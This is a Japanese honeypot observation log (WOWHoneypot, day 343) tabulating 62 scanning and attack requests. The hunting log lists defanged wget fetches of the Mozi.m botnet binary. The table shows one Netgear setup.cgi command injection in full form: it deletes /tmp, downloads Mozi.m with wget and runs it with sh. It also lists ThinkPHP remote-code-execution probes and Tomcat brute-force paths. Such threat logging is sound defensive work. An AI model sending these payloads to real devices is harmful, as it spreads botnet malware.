WOWHoneypot観察(343日目)
2020/02/24(月)
トータルは62件でした。
ハンティングログは以下です。
113.134.156[.]216 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m |
27.155.55[.]173 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m |
件数 | 概要 | リクエスト |
---|---|---|
22 | アクセス | GET / |
15 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
14 | 調査 | GET /is_test |
2 | phpMyAdminの調査 | GET /admin-scripts.asp |
2 | 不正中継の試み | CONNECT ip.ws.126.net:443 |
1 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
1 | vtigerCRMの調査 | GET /vtigercrm/vtigerservice.php |
1 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | |
1 | Tomcatの調査 | GET /manager/text/list |
1 | FreePBXの調査 | GET /a2billing/admin/Public/index.php |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |